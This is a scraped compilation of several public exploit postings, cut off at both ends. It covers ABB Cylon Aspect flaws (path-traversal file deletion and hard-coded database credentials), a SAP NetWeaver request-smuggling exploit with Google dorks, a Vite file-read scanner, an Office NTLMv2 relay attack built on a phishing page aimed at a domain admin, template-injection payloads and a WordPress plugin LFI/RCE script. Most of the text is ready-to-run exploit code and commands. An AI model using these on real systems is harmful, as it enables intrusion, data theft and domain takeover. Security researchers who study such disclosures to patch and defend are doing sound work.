PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5827
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5827.php
CVE ID: CVE-2024-6209
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6209
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -X POST http://192.168.73.31/databaseFileDelete.php \
> -d "file0=../../../../../../../../../home/MIX_CMIX/htmlroot/validate/validateHeader.php \
> &delete0=1 \
> &total=1 \
> &submitDeleteForm=Delete"
<META HTTP-EQUIV='Refresh' content='0;URL=databaseFile.php'>
# Exploit Title: SAPGateBreaker Exploit - CVE-2022-22536 - HTTP Request Smuggling Through SAP's Front Door
# Google Dork: https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit/blob/main/dorks
# Date: Tuesday, April 2, 2025
# Exploit Author: @C41Tx90 - Victor de Queiroz - Beco do Exploit - Elytron Security
# Vendor Homepage: https://community.sap.com/t5/technology-blogs-by-members/remediation-of-cve-2022-22536-request smuggling-and-request-concatenation/ba-p/13528083
# Software Link: https://help.sap.com/docs/SUPPORT_CONTENT/uiwits/3361892375.html
# Version: SAP NetWeaver Application Server ABAP, SAP NetWeaver
Application Server Java, ABAP Platform, SAP Content Server 7.53 and
SAP Web Dispatcher
# Tested on: Red Hat Enterprise Linux (RHEL)
# CVE : 2022-22536
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
------
SAPGateBreaker - CVE-2022-22536 HTTP Request Smuggler
Author: @C41Tx90 - Victor de Queiroz | elytronsecurity.com |
becodoexploit.com
----------------------------------------------------------------------------
Target: SAP NetWeaver Application Server
Vulnerability: CVE-2022-22536
Exploit Type: HTTP Request Smuggling (Content-Length-based)
Impact: ACL Bypass, Internal Access
More information and explanations:
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
----------------------------------------------------------------------------
Sample Payload:
----------------------------------------------------------------------------
GET /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0)
Gecko/20100101 Firefox/136.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.32.22.7:50000/sap/admin/public/default.html
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Cookie: saplb_*=(J2EE7364720)7364750
Authorization: Basic YTph
Content-Length: 89
0\r
\r
GET /heapdump/ HTTP/1.1\r
Host: 127.0.0.1\r
X-Forwarded-For: 127.0.0.1\r
\r
----------------------------------------------------------------------------
Expected Response:
----------------------------------------------------------------------------
HTTP/1.1 200 OK
server: SAP NetWeaver Application Server
last-modified: Tue, 01 Sep 2020 11:54:39 GMT
sap-cache-control: +3600
date: Tue, 01 Apr 2025 20:49:02 GMT
content-length: 4465
content-type: text/html
connection: Keep-Alive
x-dummy: 0
----------------------------------------------------------------------------
Indicators of Success:
- Status code 200 for internal endpoints
- Difference between direct access (403/404) and smuggled (200)
- Access to otherwise restricted SAP services via loopback injection
----------------------------------------------------------------------------
Example Paths Tested:
- /sap/public/bc/icf/info
- /sap/bc/webdynpro/sap/appl_soap_management
- /heapdump/
- /ctc/ConfigServlet
- /sap/public/bc/icf/logon.html
- /webdynpro/resources/sap.com/tc~lm~config~content/
----------------------------------------------------------------------------
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
Google Dorks:
intitle:"SAP NetWeaver Application Server Java" inurl:/webdynpro/resources/
intitle:"SAP NetWeaver" "SAP J2EE Engine"
intitle:"Welcome to SAP NetWeaver" inurl:/irj/portal
intitle:"SAP NetWeaver Administrator" inurl:/nwa
inurl:"/sap/bc/webdynpro" -site:sap.com
inurl:"/sap/public" "SAP NetWeaver"
inurl:"/sap/admin/public/default.html"
inurl:"/webdynpro/welcome/Welcome.html"
inurl:"/sap/public/info.jsp"
"Powered by SAP NetWeaver" inurl:sap
intitle:"SAP Web Dispatcher Administration"
----------------------------------------------------------------------------
# Exploit
import argparse
import http.client
from urllib.parse import urlparse
from colorama import Fore, Style, Back, init
import os
init(autoreset=True)
BANNER = f"""
{Fore.WHITE}
+---------------------------+
(\__/\ Breaking the Gate |
{Style.BRIGHT}{Fore.WHITE}by{Style.RESET_ALL}
{Fore.YELLOW}@C41Tx90{Fore.WHITE} |
({Fore.RED}•{Fore.WHITE}デ{Fore.RED}•{Fore.WHITE})
{Style.BRIGHT}{Fore.YELLOW} CVE-2022-22536{Style.RESET_ALL} |
{Fore.GREEN}t.me/becodoxpl{Fore.WHITE} |
/ つ {Fore.WHITE}HTTP Request Smuggler |
{Fore.YELLOW}becodoexploit.com{Fore.WHITE} |
|
{Fore.LIGHTBLUE_EX}elytronsecurity.com{Fore.WHITE} |
+---------------------------+
"""
def detect_sap_version(host, port, is_https):
try:
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port, timeout=5)
conn.request("GET", "/")
res = conn.getresponse()
headers = {k.lower(): v for k, v in res.getheaders()}
server_header = headers.get("server", "Unknown")
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Detected SAP Server
Header: {Fore.CYAN}{server_header}\n")
return server_header
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Could not determine SAP
version: {e}\n")
return "Unknown"
def build_smuggled_request(path):
return f"0\r\n\r\nGET {path} HTTP/1.1\r\nHost:
127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
def try_file_read(host, port, is_https, verbose):
test_paths = [
"/sap/public/bc/icf/info",
"/sap/public/info.jsp",
"/sap/public/test/test.jsp",
"/sap/bc/webdynpro/sap/appl_soap_management",
"/sap/public/bc/soap/rfc",
"/webdynpro/welcome/Welcome.html",
"/sr_central",
"/useradmin/.jsp",
"/heapdump/",
"/startPage",
"/crossdomain.xml",
"/ctc/ConfigServlet",
"/webdynpro/resources/sap.com/tc~lm~config~content/",
"/sld",
"/sap/bc/webdynpro/sap/wdy_cfg_component_config",
"/sap/public/bc/icf/logon.html",
"/sap/bc/webdynpro/sap/itadmin",
"/sap/public/bc/sec/saml2",
"/sap/public/bc/webdav"
]
print(f"{Style.BRIGHT}{Fore.RED}[!] {Fore.WHITE}Proof of Concept
for ACL Bypass via HTTP Request Smuggling{Style.RESET_ALL}\n")
for path in test_paths:
try:
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port)
conn.request("GET", path)
res_direct = conn.getresponse()
content_direct = res_direct.read().decode(errors="ignore")
direct_status = res_direct.status
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error checking direct
access for {path}: {e}")
continue
body = build_smuggled_request(path)
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
try:
conn = conn_class(host, port)
conn.request("POST", "/sap/admin/public/default.html",
body=body, headers=headers)
res = conn.getresponse()
smuggled_headers = res.getheaders()
content_smuggled = res.read().decode(errors="ignore")
smuggled_status = res.status
status_color = Fore.GREEN if smuggled_status !=
direct_status else Fore.RED
print(f"{status_color}[-] {Fore.LIGHTBLUE_EX}{path}
{Style.BRIGHT}{Fore.WHITE}Direct Access:
{Fore.YELLOW}({direct_status}) {Fore.WHITE}Smuggled Access:
{status_color}({smuggled_status}){Style.RESET_ALL}")
if smuggled_status == direct_status:
print(f"{Fore.RED}[x] {Fore.WHITE}Exploit did not work
for {path}\n")
with open("poc.txt", "a") as f:
f.write(f"\n--- Path: {path} ---\n")
f.write(f"Direct: {direct_status}\nSmuggled:
{smuggled_status}\n")
f.write(f"Smuggled Request:\nPOST
/sap/admin/public/default.html HTTP/1.1\n")
for k, v in headers.items():
f.write(f"{k}: {v}\n")
f.write(f"\n{body}\n")
f.write(f"Smuggled Response Headers:\n")
for h in smuggled_headers:
f.write(f"{h[0]}: {h[1]}\n")
if verbose:
f.write(f"\nSmuggled Response Body:\n{content_smuggled}\n")
f.write(f"\nDirect Response:\n{content_direct}\n")
if verbose:
print(f"\n{Fore.BLUE}>>> Sent Payload to
{path}:{Style.RESET_ALL}")
print(f"{Fore.CYAN}POST
/sap/admin/public/default.html HTTP/1.1")
for k, v in headers.items():
print(f"{Fore.CYAN}{k}: {v}")
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
print(f"{Back.YELLOW if smuggled_status == 500
else Fore.CYAN}{Fore.WHITE}HTTP/1.1
{smuggled_status}{Style.RESET_ALL}")
for h in smuggled_headers:
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
print(f"\n{Fore.CYAN}{content_smuggled}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error smuggling to {path}: {e}")
def send_smuggled_request(target, verbose):
parsed = urlparse(target)
is_https = parsed.scheme == 'https'
port = parsed.port or (443 if is_https else 80)
host = parsed.hostname
print(BANNER)
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Starting CVE-2022-22536
exploitation on {host}:{port}\n")
detect_sap_version(host, port, is_https)
body = build_smuggled_request("/sap/bc/webdynpro/sap/appl_soap_management")
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port)
try:
conn.request("POST", "/sap/admin/public/default.html",
body=body, headers=headers)
res = conn.getresponse()
content = res.read().decode(errors="ignore")
status_display = f"HTTP/{res.version/10:.1f} {res.status} {res.reason}"
is_exploit_success = res.status in [200, 500, 403, 302]
print(f"{Fore.GREEN if is_exploit_success else Fore.RED}[-]
{Fore.WHITE}Exploit executed{' successfully' if is_exploit_success
else ''}! {Fore.YELLOW}CVE-2022-22536")
print(f"{Fore.WHITE}{'-'*60}\n")
print(f"{Fore.BLUE}>>> Sent Payload:{Style.RESET_ALL}")
print(f"{Fore.CYAN}POST /sap/admin/public/default.html HTTP/1.1")
for k, v in headers.items():
print(f"{Fore.CYAN}{k}: {v}")
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
print(f"{Back.YELLOW if res.status == 500 else
Fore.CYAN}{Fore.WHITE}{status_display}{Style.RESET_ALL}")
for h in res.getheaders():
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
if verbose:
print(f"\n{Fore.CYAN}{content}{Style.RESET_ALL}")
with open("poc.txt", "w") as f:
f.write(f"Initial Request:\nPOST
/sap/admin/public/default.html HTTP/1.1\n")
for k, v in headers.items():
f.write(f"{k}: {v}\n")
f.write(f"\n{body}\n")
f.write(f"Initial Response:\n{status_display}\n")
for h in res.getheaders():
f.write(f"{h[0]}: {h[1]}\n")
f.write(f"\n{content}\n")
print("\n")
if is_exploit_success:
print(f"{Fore.GREEN}[=] {Fore.WHITE}The exploit executed
successfully and triggered an internal processing behavior. This
indicates a potential HTTP request smuggling condition.")
else:
print(f"{Fore.RED}[x] {Fore.WHITE}The exploit did not
trigger the expected behavior. Target may not be vulnerable.")
print(f"\n{Fore.WHITE}{'-'*60}\n")
try_file_read(host, port, is_https, verbose)
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error sending initial request: {e}")
def main():
parser = argparse.ArgumentParser(description="CVE-2022-22536 Smuggling PoC")
parser.add_argument("-u", "--url", required=True, help="Target
full URL (e.g., http://host:port)")
parser.add_argument("--verbose", "-v", action="store_true",
help="Show full headers and responses")
args = parser.parse_args()
os.system('clear')
send_smuggled_request(args.url, args.verbose)
if __name__ == "__main__":
main()
----------------------------------------------------------------------------
https://nvd.nist.gov/vuln/detail/CVE-2022-22536
https://launchpad.support.sap.com/#/notes/3123396
https://blogs.sap.com/2022/02/08/patch-your-sap-netweaver-application-server-asap-cve-2022-22536/
# Exploit Title: Vite Arbitrary File Read - CVE-2025-30208
# Date: 2025-04-03
# Exploit Author: Sheikh Mohammad Hasan (https://github.com/4m3rr0r)
# Vendor Homepage: https://vitejs.dev/
# Software Link: https://github.com/vitejs/vite
# Version: <= 6.2.2, <= 6.1.1, <= 6.0.11, <= 5.4.14, <= 4.5.9
# Tested on: Ubuntu
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-30208
# https://github.com/advisories/GHSA-x574-m823-4x7w
# CVE : CVE-2025-30208
"""
################
# Description #
################
Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
"""
import requests
import argparse
import urllib3
from colorama import Fore, Style
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def check_vulnerability(target, file_path, verbose=False, output=None):
url = f"{target}{file_path}?raw"
print(f"{Fore.CYAN}[*] Testing: {url}{Style.RESET_ALL}")
try:
response = requests.get(url, timeout=5, verify=False) # Ignore SSL verification
if response.status_code == 200 and response.text:
vuln_message = f"{Fore.GREEN}[+] Vulnerable : {url}{Style.RESET_ALL}"
print(vuln_message)
if verbose:
print(f"\n{Fore.YELLOW}--- File Content Start ---{Style.RESET_ALL}")
print(response.text[:500]) # Print first 500 characters for safety
print(f"{Fore.YELLOW}--- File Content End ---{Style.RESET_ALL}\n")
if output:
with open(output, 'a') as f:
f.write(f"{url}\n")
else:
print(f"{Fore.RED}[-] Not vulnerable or file does not exist: {url}{Style.RESET_ALL}")
except requests.exceptions.RequestException as e:
print(f"{Fore.YELLOW}[!] Error testing {url}: {e}{Style.RESET_ALL}")
def check_multiple_domains(file_path, file_to_read, verbose, output):
try:
with open(file_to_read, 'r') as file:
domains = file.readlines()
for domain in domains:
domain = domain.strip()
if domain:
check_vulnerability(domain, file_path, verbose, output)
except FileNotFoundError:
print(f"{Fore.RED}[!] Error: The file '{file_to_read}' does not exist.{Style.RESET_ALL}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="PoC for CVE-2025-30208 - Vite Arbitrary File Read")
parser.add_argument("target", nargs="?", help="Target URL (e.g., http://localhost:5173)")
parser.add_argument("-l", "--list", help="File containing list of domains")
parser.add_argument("-f", "--file", default="/etc/passwd", help="File path to read (default: /etc/passwd)")
parser.add_argument("-v", "--verbose", action="store_true", help="Show file content if vulnerable")
parser.add_argument("-o", "--output", help="Output file to save vulnerable URLs")
args = parser.parse_args()
if args.list:
check_multiple_domains(args.file, args.list, args.verbose, args.output)
elif args.target:
check_vulnerability(args.target, args.file, verbose=args.verbose, output=args.output)
else:
print(f"{Fore.RED}Please provide a target URL or a domain list file.{Style.RESET_ALL}")
# Exploit Title : ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.07.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller is operating with default and hard-coded
credentials contained in install package while exposed to the Internet.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
phpMyAdmin 2.11.9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Reported by DIVD
Advisory ID: ZSL-2024-5830
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5830.php
CVE ID: CVE-2024-4007
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-4007
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ cat max/var/www/html/phpMyAdmin/config.inc.php | grep control
$cfg['Servers'][$i]['controluser'] = 'root';
$cfg['Servers'][$i]['controlpass'] = 'F@c1liTy';
# Exploit Title: Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.office.com/
# Software Link: https://www.office.com/
# Details: https://github.com/passtheticket/CVE-2024-38200
# Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)
# Tested against: Windows 11
# CVE: CVE-2024-38200
# Description
MS Office URI schemes allow for fetching a document from remote source.
MS URI scheme format is '< scheme-name >:< command-name >"|"< command-argument-descriptor > "|"< command-argument >' .
Example: ms-word:ofe|u|http://hostname:port/leak.docx
When the URI "ms-word:ofe|u|http://hostname:port/leak.docx" is invoked from a victim computer. This behaviour is abused to capture and relay NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user's NTLMv2 hash over SMB, you can also visit https://www.privsec.nz/releases/ms-office-uri-handlers.
# Proof Of Concept
If we add a DNS A record and use this record within the Office URI, Windows will consider the hostname as part of the Intranet Zone. In this way, NTLMv2 authentication occurs automatically and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a non-existent DNS record so this attack works with default settings for a domain user.
1. Add a DNS record to resolve hostname to attacker IP address which runs ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.
$ python dnstool.py -u 'unsafe.local\testuser' -p 'pass' -r 'attackerhost' --action 'add' --data [attacker-host-IP] [DC-IP] --zone unsafe.local
2. Fire up ntlmrelayx with following command
$ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080
3. Serve following HTML file using Apache server. Replace hostname with added record (e.g. attackerhost).
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Microsoft Office</title>
</head>
<body>
<a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>
<script>
function navigateToLink() {
var link = document.getElementById('link');
if (link) {
var url = link.getAttribute('href');
window.location.href = url;
}
}
window.onload = navigateToLink;
</script>
</body>
</html>
4. Send the URL of the above HTML file to a user with domain admin privileges. You should check whether the DNS record is resolved with the ping command before sending the URL. When the victim user navigates to the URL, clicking the 'Open' button is enough to capture the NTLMv2 hash. (no warning!)
5. The captured NTLMv2 hash over HTTP is relayed to Domain Controller with ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configurations with just two clicks.
# Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection(CSTI)
# Date: 03/13/2025
# Exploit Author: tmrswrr
# Vendor Homepage: https://loadedcommerce.com/
# Version: 6.6
# Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce
Injecting {{7*7}} into the search parameter
https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}}
returns 49, confirming a template injection vulnerability.
Forgot Password:
Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page
https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process
triggers an alert, demonstrating client-side code execution.
# Exploit Title: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
# Date: 12 march 2025
# Exploit Author: Ravina
# Vendor Homepage: wprealize
# Version: 1.9.1
# Tested on: windows, linux
# CVE ID : CVE-2023-0159
# Vulnerability Type: Remote Code Execution
------------------------------------------------
# CVE-2023-0159_scan.py
#!/usr/bin/env python3
# LFI: ./exploit.py --mode lfi --target https://vuln-site.com --file /etc/passwd
# RCE: ./exploit.py --mode rce --target https://vuln-site.com --command "id" --generator /path/to/php_filter_chain_generator.py
import argparse
import requests
import base64
import subprocess
import time
import php_filter_chain_generator
def run_lfi(target, file_path):
url = f"{target}/wp-admin/admin-ajax.php"
payload = {
'action': 'extensive_vc_init_shortcode_pagination',
'options[template]': f'php://filter/convert.base64-encode/resource={file_path}'
}
try:
response = requests.post(url, data=payload)
if response.status_code == 200 and '{"status":"success","message":"Items are loaded","data":' in response.text:
try:
json_data = response.json()
base64_content = json_data['data']['items']
decoded = base64.b64decode(base64_content).decode()
print(f"\n[+] Successfully read {file_path}:\n")
print(decoded)
except Exception as e:
print(f"[-] Decoding failed: {str(e)}")
print(f"Raw response (truncated): {response.text[:500]}...")
else:
print(f"[-] LFI failed (Status: {response.status_code})")
except Exception as e:
print(f"[-] Request failed: {str(e)}")
def run_rce(target, command, generator_path):
# Base64 encode command to handle special characters
encoded_cmd = base64.b64encode(command.encode()).decode()
php_code = f'<?php system(base64_decode("{encoded_cmd}")); ?>'
# Generate filter chain
try:
result = subprocess.run(
[generator_path, '--chain', php_code],
capture_output=True,
text=True,
check=True
)
payload = None
for line in result.stdout.split('\n'):
if line.startswith('php://filter'):
payload = line.strip()
break
if not payload:
print("[-] Failed to generate payload")
return
url = f"{target}/wp-admin/admin-ajax.php"
data = {'action': 'extensive_vc_init_shortcode_pagination', 'options[template]': payload}
print(f"[*] Sending payload for command: {command}")
start_time = time.time()
# Send the request to attempt RCE and dont forget to pass the generator path
response = requests.post(url, data=data)
elapsed = time.time() - start_time
print(f"\n[+] Response time: {elapsed:.2f} seconds")
print(f"[+] Status code: {response.status_code}")
if response.status_code == 200:
print("\n[+] Response content:")
print(response.text[:1000] + ("..." if len(response.text) > 1000 else ""))
except subprocess.CalledProcessError as e:
print(f"[-] Filter chain generator failed: {e.stderr}")
except FileNotFoundError:
print(f"[-] Generator not found at {generator_path}")
except Exception as e:
print(f"[-] RCE failed: {str(e)}")
def main():
parser = argparse.ArgumentParser(description="CVE-2023-0159 Exploit Script")
parser.add_argument("--mode", choices=["lfi", "rce"], required=True, help="Exploit mode")
parser.add_argument("--target", required=True, help="Target URL (e.g., https://example.com)")
parser.add_argument("--file", help="File path for LFI mode")
parser.add_argument("--command", help="Command to execute for RCE mode")
parser.add_argument("--generator", default="php_filter_chain_generator.py",
help="Path to php_filter_chain_generator.py")
args = parser.parse_args()
if args.mode == "lfi":
if not args.file:
print("[-] Missing --file argument for LFI mode")
return
run_lfi(args.target.rstrip('/'), args.file)
elif args.mode == "rce":
if not args.command:
print("[-] Missing --command argument for RCE mode")
return
run_rce(args.target.rstrip('/'), args.command, args.generator)
if __name__ == "__main__":
main()
------------------------------------------
# php_filter_chain_generator.py
#!/usr/bin/env python3
import argparse
import base64
import re
# No need to guess a valid filename anymore
file_to_use = "php://temp"
conversions = {
'0': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2',
'1': 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4',
'2': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921',
'3': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE',
'4': 'convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE',
'5': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2',
'6': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2',
'7': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4',
'8': 'convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB',
'A': 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213',
